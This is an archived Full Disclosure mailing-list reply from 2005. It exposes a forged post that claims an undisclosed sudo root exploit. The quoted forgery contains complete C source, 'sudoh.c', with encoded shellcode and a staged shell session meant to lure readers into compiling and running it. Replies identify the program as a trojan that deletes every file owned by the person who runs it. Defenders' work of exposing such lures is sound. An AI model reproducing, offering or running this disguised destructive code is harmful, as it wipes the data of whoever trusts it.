Full Disclosure mailing list archives
Re: Undisclosed Sudo Vulnerability ?
From: Jim Clausing <jclausing () isc sans org>
Date: Sat, 30 Jul 2005 23:06:54 -0400 (EDT)
Yeah and having talked to Joel, it was a pretty good forgery. I'm pretty sure he doesn't use Lotus for his e-mail client and I know he wouldn't be sending to the list from ee.fju.edu.tw (140.136.145.2). -- Jim Clausing GCFA, GCIA, GCFW, GREM, CISSP, CCSA GPG fingerprint = 30CE 6C98 E795 39FF 6E57 220B 342E E25C 852F 302B On or about Sat, 30 Jul 2005, Kurt Seifried pontificated thusly:
This is a trojan that will nuke all the files owned by the user running it. -Kurt ----- Original Message ----- From: "Esler, Joel - Contractor" <joel.esler () rcert-s army mil> To: <full-disclosure () lists grok org uk> Sent: Saturday, July 30, 2005 12:40 PM Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?About two weeks ago, our proprietary LIDS detected some suspicious shell activity on an internal .mil machine i am in charged of. Our server runs latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled. Before shutting down the machine and reinstalling it from scratch, we installed sebek module to monitor all shell activity. Based on the data we gathered, it seems the attacker gained root privileges using an undisclosed bug in latest sudo. $ uname -a Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 GNU/Linux $ sudo -V Sudo version 1.6.8p9 $ ls -al /tmp/.phc -rwsr-xr-x 1 root root 304873 Jul 05 03:45 /tmp/.phc Here is an excerpt of a shell session we recorded: <.........> $ cat >blaat.uue<<'EH'--------------------------------------------------------------------------------EH $ uudecode blaat.uue $ cat sudoh.c /* * off by one ebp overwrite in sudo prompt parsing func (bground mode only) * * "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard Johnson * * gcc -pipe -o sudoh sudoh.c ; ./sudoh * * happy deathday route * */ #include <stdio.h> #include <unistd.h> #include <string.h> #include <alloca.h> #define SUDO_PROMPT "%u@%h> \\%" #define shellcode esp #define RETS_NUM 246 /* generic */ #define NOPS_NUM 116 /* generic */ /* * Linux x86 non-interactive exec * {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c") */ char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;"; /* = "\xcc\xeb\xfe"; */ void fill (char *buff, int size, unsigned long val) { unsigned long *ptr = (unsigned long *) buff; for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = val; } unsigned long get_sp (void) { __asm__ ("lea esp, %eax"); } char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode) { int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen (shellcode); unsigned char *nops = alloca (nops_nums); unsigned char *rets = alloca (rets_nums); unsigned long ret = get_sp (); static char exp_buffer [8192]; /* make sure sudo isatty() fails */ close (0); close (1); close (2); fill (nops, (unsigned char) nops_nums, 0x90909090); fill (rets, (unsigned char) rets_nums, ret); /* be nice plz */ if (size > sizeof (exp_buffer)) { fprintf (stderr, "buffer's t00 small..\n"); return NULL; } snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s", SUDO_PROMPT, /* evilz prompt */ nops, shellcode, rets); /* exploit buff */ return exp_buffer; } int main(int argv, char *argc[]) { char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode); /* thanks again T0dd :) */ execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, "/bin/false", NULL); /* ok, shellroot should await you @ "HISTFILE=/dev/null /tmp/.phc -p" */ return 0; } $ gcc -pipe -o sudoh sudoh.c {standard input}: Assembler messages: {standard input}:5: Warning: Ignoring changed section attributes for .text $ ./sudoh $ cat /bin/cat > blaat.uue; rm blaat.uue $ cat /bin/cat > sudoh.c; rm sudoh.c $ cat /bin/cat > sudoh; rm sudoh $ HISTFILE=/dev/null /tmp/.phc -p id uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody) <.........> Todd Miller, the maintainer of Sudo has been informed yesterday, and it is strongly advised to "sudo su -c chmod -s sudo" until a patch is out. J Joel Esler, GCIA joel.esler () rcert-s army mil 706-791-7165 DSN: 780-7165 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Undisclosed Sudo Vulnerability ? Esler, Joel - Contractor (Jul 30)
- Re: Undisclosed Sudo Vulnerability ? Kurt Seifried (Jul 30)
- Re: Undisclosed Sudo Vulnerability ? Kurt Seifried (Jul 30)
- Re: Undisclosed Sudo Vulnerability ? Jim Clausing (Jul 31)
- Re: re: Undisclosed Sudo Vulnerability ? Frank Knobbe (Jul 31)
- Re: re: Undisclosed Sudo Vulnerability ? Todd C. Miller (Jul 31)